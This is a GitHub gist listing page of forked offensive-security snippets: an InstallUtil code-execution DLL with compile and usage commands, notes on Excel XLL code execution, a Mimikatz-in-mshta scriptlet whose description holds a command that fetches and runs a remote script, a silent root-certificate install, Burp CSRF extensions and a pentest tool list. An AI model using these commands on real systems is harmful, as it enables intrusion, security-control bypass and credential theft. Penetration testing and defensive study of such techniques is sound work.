@minkione
minkione / installUtil.cs
Last active November 27, 2017 11:28 — forked from Arno0x/installUtil.cs
Example of a C# DLL to be used with the InstallUtil utility to make it execute some arbitrary code
/*
Author: Arno0x0x, Twitter: @Arno0x0x
===================================== COMPILING =====================================
C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe /target:library /unsafe /out:installUtil.dll installUtil.cs
===================================== USAGE =====================================
C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe /logtoconsole=false /logfile= /u installUtil.dll
*/
@minkione
minkione / getMoreDomains.py
Created December 27, 2017 10:50 — forked from milo2012/getMoreDomains.py
Get Domains Belonging to Organization from securitytrails.com
import requests
import json
import pprint
import sys
import dns.message
import dns.query
import dns.rdatatype
import dns.resolver
import dns.reversename
import time
@minkione
minkione / my_ys1_notes.md
Created January 3, 2018 21:51 — forked from JamesHagerman/my_ys1_notes.md
Some useful YARD Stick One notes

This thing is a bit of a beast. People don't give it NEARLY the credit or the documentation it deserves.

There are two ways of using this thing: use rfcat directly, or write a Python script for it.

Basically, writing a Python script is easier. Using rfcat directly is great, but often there are just too many silly settings to configure

@minkione
minkione / Readme.md
Created January 18, 2018 17:05 — forked from rxwx/Readme.md

Notes

An XLL file is basically a DLL with some special features to make it work with Excel.

See - https://msdn.microsoft.com/en-us/library/office/bb687911.aspx

By creating a DLL which exports xlAutoOpen, and then renaming the compiled DLL to .xll, we can execute our code in DllMain when the file is loaded by Excel.

The attached .xll file will open with Excel (by default) when double-clicked. The user will then be presented with a warning. If the warning is clicked through, then our code is executed.

@minkione
minkione / mimikatz.sct
Created January 18, 2018 17:08
Mimikatz inside mshta.exe - "mshta.exe javascript:a=GetObject("script:http://127.0.0.1:8000/mshta.sct").Exec(); log coffee exit"
<?XML version="1.0"?>
<scriptlet>
<registration
description="Bandit"
progid="Bandit"
version="1.00"
classid="{AAAA1111-0000-0000-0000-0000FEEDACDC}"
>
@minkione
minkione / lxc-kali.sh
Created January 23, 2018 12:07 — forked from nethunteros/lxc-kali.sh
Build Kali container in LXC
#!/bin/bash
##########################################################################################
# (right now the lxc bridge interface isn't working with this guide)
# (still had to install lxc over this)
# This is for my testing env for building a kali template for LXC
# You may need to install additional packages.
#
##########################################################################################
# Prereqs
@minkione
minkione / CSRFToken.py
Created January 26, 2018 08:26 — forked from thomaspatzke/CSRFToken.py
Burp extension: extract CSRF tokens from responses of selected Burp tools and update them with a custom session handling rule.
from burp import (IBurpExtender, IBurpExtenderCallbacks, ISessionHandlingAction, IHttpListener)
import re
class BurpExtender(IBurpExtender, ISessionHandlingAction, IHttpListener):
    def registerExtenderCallbacks(self, callbacks):
        self.callbacks = callbacks
        self.helpers = callbacks.getHelpers()
        callbacks.setExtensionName("Session CSRF Token Handling")
        self.callbacks.registerSessionHandlingAction(self)
        self.callbacks.registerHttpListener(self)
@minkione
minkione / Burp-CSRFRandomName.py
Created January 26, 2018 08:26 — forked from thomaspatzke/Burp-CSRFRandomName.py
Burp Session Handling Extension: CSRF tokens with random parameter names
from burp import (IBurpExtender, IBurpExtenderCallbacks, ISessionHandlingAction, IHttpListener)
import re
class BurpExtender(IBurpExtender, ISessionHandlingAction, IHttpListener):
    def registerExtenderCallbacks(self, callbacks):
        self.callbacks = callbacks
        self.helpers = callbacks.getHelpers()
        callbacks.setExtensionName("Handling of CSRF Tokens with Random Names")
        self.callbacks.registerSessionHandlingAction(self)
        self.callbacks.registerHttpListener(self)
@minkione
minkione / script.ps1
Created January 28, 2018 13:54
Hooking MessageBox For No-Prompt Trusted Root Certificate Install
#Verify Not Present
( Get-ChildItem Cert:\CurrentUser\Root | Where-Object {$_.Subject -match "__Interceptor_Trusted_Root" })
#Import-Certificate
( Get-ChildItem -Path C:\Test\thing.cer ) | Import-Certificate -CertStoreLocation cert:\CurrentUser\Root
#Prompted
Remove-Item -Path cert:\CurrentUser\Root\5C205339AE9FA846FA99D3FFF0CDEE65EB8D8E99
@minkione
minkione / pwnd.md
Created January 29, 2018 08:36 — forked from MattKetmo/pwnd.md
pwnd

Tools

  • Metasploit: Penetration testing software
  • BeEF: The Browser Exploitation Framework
  • PTF: Penetration Testers Framework
  • Bettercap: MITM framework
  • Nessus: Vulnerability scanner
  • AutoNessus: Auto Nessus
  • BDFProxy: Patch Binaries via MITM (BackdoorFactory)
  • Xplico: Network Forensic Analysis Tool (eg. parse pcap file)